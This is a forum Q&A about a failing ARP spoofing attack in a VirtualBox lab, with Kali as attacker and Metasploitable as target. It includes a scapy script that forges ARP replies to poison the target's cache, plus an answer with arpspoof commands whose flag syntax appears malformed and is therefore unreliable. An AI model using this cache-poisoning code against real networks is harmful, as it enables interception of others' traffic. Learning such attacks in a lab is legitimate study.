# I'm try an arp spoofing attack with scapy, but my target arp table register my ip address instead the spoofed one

Tags: virtualbox, scapy, kali-linux, mac-spoofing

I'm trying to make an arpspoofing attack with scapy.
I'm working with virtualbox in Linux Min OS, My attack machine is KaliLinux and my target is Metasploitable.
This is my scapy script:

```
targetIP="192.168.56.103"
gatewayIP="192.168.56.1"
myIP="192.168.56.101"
targetMAC="08:00:27:57:58:54"
myMAC="08:00:27:7d:94:1e"

a = ARP()
a.psrc = gatewayIP
a.pdst = targetIP
a.hwdst = targetMAC
a.hwsrc = myMAC
a.op = 2

send(a)
```

After i sent a i would expect that arp table of target will be

gatewayIP => myMAC

but instead I get

myIp => myMAC

What am i doing wrong?

Comment: I don't see anything wrong with it. Did you check Wireshark traffic to see if there's anything unexpected going on behind the scenes, like your router sending out ARPs to your computer? For reference, [this](https://gist.github.com/carcigenicate/b682e3d968483d056f9c735234d36434) is what I used to create ARP packets.

Comment: I will check it thank you

Answer (score 0):

If you want to see arp table in Kalilinux; you can write arp --a on prompt. And also if you want to attack you can use;
arpspoof -i eth0 --targetIP NetworkDeviceIP
arpspoof -i eth0 --NetworkDeviceIP targetIP

But do not forget to make IP forward.

I hope, it will work.